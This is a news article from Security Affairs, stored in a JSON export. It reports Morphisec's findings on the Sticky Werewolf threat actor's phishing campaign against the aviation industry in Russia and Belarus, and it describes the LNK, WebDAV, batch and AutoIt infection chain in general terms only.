{"id":164345,"date":"2024-06-10T10:18:33","date_gmt":"2024-06-10T10:18:33","guid":{"rendered":"https:\/\/securityaffairs.com\/?p=164345"},"modified":"2024-06-10T10:18:34","modified_gmt":"2024-06-10T10:18:34","slug":"sticky-werewolf-targets-aviation-industry","status":"publish","type":"post","link":"https:\/\/securityaffairs.com\/164345\/hacking\/sticky-werewolf-targets-aviation-industry.html","title":{"rendered":"Sticky Werewolf targets the aviation industry in Russia and Belarus<\/gwmw>"},"content":{"rendered":"
<\/div>\n
Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus.<\/h2>\n\n\n\n
Sticky Werewolf is a threat actor that was first spotted in April 2023, initially targeting public organizations in Russia and Belarus. The group has expanded its operations to various sectors, including a pharmaceutical company and a Russian research institute specializing in microbiology and vaccine development.<\/p>\n\n\n\n
In their latest campaign, Sticky Werewolf targeted the aviation industry with emails supposedly from the First Deputy General Director of AO OKB Kristall, a Moscow-based company involved in aircraft and spacecraft production and maintenance. Previously, the group used phishing emails with links to malicious files. In the latest campaign, the threat actor used archive files containing LNK files that pointed to a payload stored on WebDAV servers.<\/p>\n\n\n\n
After executing the binary hosted on a WebDAV server, an obfuscated Windows batch script is launched. The script runs an AutoIt script that ultimately injects the final payload.<\/gwmw><\/p>\n\n\n\n